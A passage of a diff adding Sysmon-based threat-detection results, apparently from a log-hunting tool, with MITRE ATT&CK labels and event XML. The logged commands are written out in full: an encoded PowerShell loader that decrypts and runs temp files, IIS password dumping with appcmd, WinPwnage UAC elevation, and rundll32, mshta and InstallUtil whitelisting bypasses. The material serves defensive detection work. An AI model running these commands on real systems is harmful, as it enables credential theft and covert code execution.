0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1557621150.227012,2019-05-12T04:32:30.227012+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16243
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 00:32:30.023
+ 365ABB72-699E-5CD7-0000-001073582200
+ 3876
+ C:\Windows\System32\schtasks.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Manages scheduled tasks
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\schtasks.exe" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator
+ c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-5DEC-5CD7-0000-00204A380100
+ 0x1384a
+ 1
+ High
+ SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9
+ 365ABB72-6998-5CD7-0000-00104E422200
+ 2740
+ C:\Python27\python.exe
+ python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558969958.290374,2019-05-27T19:12:38.290374+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c whoami /groups ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 6168
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 15:12:38.231
+ 365ABB72-FE66-5CEB-0000-001058F50B00
+ 3256
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /c whoami /groups
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-7B40-5CEC-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-FD85-5CEB-0000-00104C0E0B00
+ 1944
+ C:\Windows\System32\notepad.exe
+ "C:\Windows\System32\notepad.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 556863
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2021-08-07 23:33:08.339
+ 747F3D96-1834-610F-0000-00105FE5D300
+ 6576
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-1231-610F-0000-002057A80700
+ 0x7a857
+ 1
+ Medium
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-182D-610F-0000-00106F40D300
+ 9932
+ C:\Windows\SysWOW64\mshta.exe
+ "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 556863
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2021-08-07 23:33:08.339
+ 747F3D96-1834-610F-0000-00105FE5D300
+ 6576
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-1231-610F-0000-002057A80700
+ 0x7a857
+ 1
+ Medium
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-182D-610F-0000-00106F40D300
+ 9932
+ C:\Windows\SysWOW64\mshta.exe
+ "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 556863
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2021-08-07 23:33:08.339
+ 747F3D96-1834-610F-0000-00105FE5D300
+ 6576
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-1231-610F-0000-002057A80700
+ 0x7a857
+ 1
+ Medium
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-182D-610F-0000-00106F40D300
+ 9932
+ C:\Windows\SysWOW64\mshta.exe
+ "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920559.784314,2019-05-27T05:29:19.784314+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:password ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5967
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:19.714
+ 365ABB72-3D6F-5CEB-0000-0010F2CFFF00
+ 3844
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:password
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1589239346.761944,2020-05-12T03:22:26.761944+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 142033
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-05-11 23:22:26.451
+ 747F3D96-DE32-5EB9-0000-00103FC14300
+ 5252
+ C:\Windows\System32\svchost.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Host Process for Windows Services
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-5461-5EBA-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69
+ 00000000-0000-0000-0000-000000000000
+ 580
+ ?
+ ?
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5435
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-03 12:06:55.471
+ 747F3D96-78DF-5D45-0000-0010EF400401
+ 4320
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe"
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-56A3-5D45-0000-0020B3D31800
+ 0x18d3b3
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-78DF-5D45-0000-0010BD350401
+ 5756
+ C:\Windows\System32\Dism.exe
+ "C:\Windows\system32\dism.exe" /online /norestart /apply-unattend:"C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1628379182.783518,2021-08-08T03:33:02.783518+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 556726
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2021-08-07 23:33:01.121
+ 747F3D96-182D-610F-0000-00100344D300
+ 11196
+ C:\Windows\System32\svchost.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Host Process for Windows Services
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ svchost.exe
+ C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
+ C:\Windows\system32\
+ NT AUTHORITY\LOCAL SERVICE
+ 747F3D96-90AF-610F-0000-0020E5030000
+ 0x3e5
+ 0
+ System
+ SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69
+ 00000000-0000-0000-0000-000000000000
+ 632
+ ?
+ ?
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1603490287.601524,2020-10-24T01:58:07.601524+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\schtasks.exe ) through command line ( schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 424079
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-23 21:57:36.627
+ 747F3D96-51D0-5F93-0000-001079C05B00
+ 8572
+ C:\Windows\SysWOW64\schtasks.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Task Scheduler Configuration Tool
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ schtasks.exe
+ schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers
+ C:\Users\IEUser\AppData\Local\Temp\tmp1375\
+ MSEDGEWIN10\IEUser
+ 747F3D96-4690-5F93-0000-002085A50800
+ 0x8a585
+ 1
+ High
+ SHA1=77F125CE5840293890E1359483C7104AADE25FA7,MD5=5BD86A7193D38880F339D4AFB1F9B63A,SHA256=72900A86F3BED7570AA708657A76DD76BB80B68DB543D303DA401AC6983E39CE,IMPHASH=012D1B3C5FD8B10F0F36DB7243A28CB8
+ 747F3D96-51D0-5F93-0000-0010B2B35B00
+ 5572
+ C:\Windows\SysWOW64\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564435988.318896,2019-07-30T01:33:08.318896+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4897
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:08.174
+ 747F3D96-6614-5D3F-0000-001093CE8600
+ 108
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920559.563997,2019-05-27T05:29:19.563997+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:userName ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5964
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:19.513
+ 365ABB72-3D6F-5CEB-0000-0010CFCAFF00
+ 3892
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:userName
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0